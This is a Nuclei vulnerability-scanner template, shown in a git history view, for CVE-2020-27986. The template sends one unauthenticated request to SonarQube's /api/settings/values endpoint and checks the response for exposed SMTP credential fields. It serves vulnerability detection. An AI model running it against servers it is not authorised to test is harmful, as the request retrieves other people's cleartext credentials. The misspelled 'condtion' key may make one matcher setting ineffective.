nuclei-templates/cves/2020/CVE-2020-27986.yaml

32 lines
902 B
YAML
Raw Normal View History

2021-01-30 09:51:50 +00:00
id: CVE-2020-27986
info:
name: SonarQube unauth
author: pikpikcu
2021-01-30 10:18:46 +00:00
severity: medium
2021-01-30 09:51:50 +00:00
description: |
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
SVN, and GitLab credentials via the api/settings/values URI.
NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
refrences: https://nvd.nist.gov/vuln/detail/CVE-2020-27986
tags: cve,cve2020,sonarqube
2021-01-30 09:51:50 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/api/settings/values"
matchers-condition: and
matchers:
- type: word
words:
2021-01-30 13:52:02 +00:00
- email.smtp_host.secured
- email.smtp_password.secured
- email.smtp_port.secured
- email.smtp_username.secured
2021-01-30 09:51:50 +00:00
part: body
2021-01-30 13:52:02 +00:00
condtion: and
2021-01-30 09:51:50 +00:00
- type: status
status:
- 200